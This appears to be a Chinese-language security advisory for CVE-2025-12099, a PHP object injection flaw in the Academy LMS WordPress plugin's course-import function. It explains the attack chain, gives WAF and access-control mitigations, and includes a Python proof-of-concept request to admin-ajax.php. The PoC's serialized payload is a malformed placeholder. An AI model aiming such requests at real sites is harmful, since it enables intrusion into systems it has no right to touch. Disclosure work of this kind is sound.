CVE-2025-12099: Academy LMS WordPress插件PHP对象注入漏洞

漏洞信息

漏洞编号

CVE-2025-12099

漏洞类型

PHP对象注入

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Academy LMS – WordPress LMS Plugin for Complete eLearning Solution

漏洞概述

Academy LMS是一款WordPress平台的在线学习管理系统(LMS)插件，为教育机构和企业提供完整的电子学习解决方案。该插件在所有版本直至3.3.8版本中存在一个严重的PHP对象注入漏洞。漏洞源于import_all_courses函数对用户输入的不当反序列化处理，允许已认证的管理员级别攻击者通过构造恶意的序列化对象来注入PHP对象。虽然漏洞代码本身不包含POP链(Property-Oriented Programming)，但如果目标WordPress网站上安装了其他包含POP链的插件或主题，攻击者就可以利用这些POP链实现任意文件删除、敏感数据读取甚至远程代码执行等高危操作。此漏洞需要攻击者具有管理员权限，因此主要风险在于内部恶意管理员或被入侵的管理员账户。漏洞于2025年11月8日被披露，CVSS评分为7.2，属于高危漏洞。建议受影响的用户立即升级到最新版本或采取临时缓解措施。

技术细节

漏洞位于Academy LMS插件的import_all_courses函数中，该函数在处理课程导入功能时，直接对用户提供的序列化数据进行反序列化操作而未进行充分验证。攻击者可以通过构造包含特定PHP对象序列化的恶意payload来利用此漏洞。由于PHP的反序列化特性，当被反序列化的对象包含特定的魔术方法(如__wakeup、__destruct、__toString等)时，这些方法会自动被触发，从而可能触发POP链实现更严重的攻击效果。然而，由于Academy LMS插件本身不包含可利用的POP链，攻击者需要依赖目标网站上安装的其他插件或主题提供的POP链。常见的POP链来源包括WordPress核心插件、主题或第三方插件中的反序列化 gadget。通过组合利用Academy LMS的对象注入漏洞和已有的POP链，攻击者可以实现任意文件操作、数据库查询或代码执行等攻击目的。攻击成功的关键在于目标系统必须存在可利用的POP链，这使得漏洞的实际影响范围取决于目标站点的插件环境。

攻击链分析

STEP 1

步骤1

攻击者获取目标WordPress网站的管理员账户访问权限

STEP 2

步骤2

攻击者构造包含恶意PHP对象的序列化payload

STEP 3

步骤3

攻击者向Academy LMS的import_all_courses AJAX端点发送恶意请求

STEP 4

步骤4

插件对攻击者提供的序列化数据进行反序列化，触发对象注入

STEP 5

步骤5

如果目标站点存在POP链(来自其他插件/主题)，注入的对象将触发POP链执行

STEP 6

步骤6

攻击者利用POP链实现任意文件删除、敏感数据读取或远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-12099 PoC - Academy LMS PHP Object Injection
# Target: WordPress site with Academy LMS plugin <= 3.3.8
# Required: Administrator-level access

target_url = "http://target-wordpress-site.com"
admin_cookie = "wordpress_admin_cookie_here"  # Valid admin session cookie

# Construct malicious payload for PHP Object Injection
# Note: A POP chain from another plugin/theme is required for full exploitation
malicious_object = 'O:14:"MaliciousClass":1:{s:4:"data";s:10:";}'

# Endpoint for importing courses
endpoint = f"{target_url}/wp-admin/admin-ajax.php"

# Prepare the malicious request
data = {
    'action': 'academy_import_all_courses',
    'import_data': malicious_object,  # Malicious serialized object
    'nonce': 'your_nonce_here'  # Valid AJAX nonce
}

headers = {
    'Cookie': admin_cookie,
    'Content-Type': 'application/x-www-form-urlencoded'
}

# Send the exploit request
response = requests.post(endpoint, data=data, headers=headers)

print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")

# If POP chain exists, the injected object will trigger malicious actions
# Common POP chain targets: file deletion, data exfiltration, RCE

影响范围

Academy LMS WordPress Plugin < 3.3.9

防御指南

临时缓解措施

如果无法立即升级插件，可以采取以下临时缓解措施：1) 限制具有管理员权限的用户数量，并监控异常管理员行为；2) 禁用或限制课程导入功能的使用；3) 在Web应用防火墙(WAF)上添加规则，检测和阻止异常的序列化数据；4) 审查并禁用可能包含POP链的其他插件；5) 实施严格的访问控制，确保只有可信的管理员才能访问WordPress后台；6) 定期备份网站数据，以便在发生安全事件时能够快速恢复。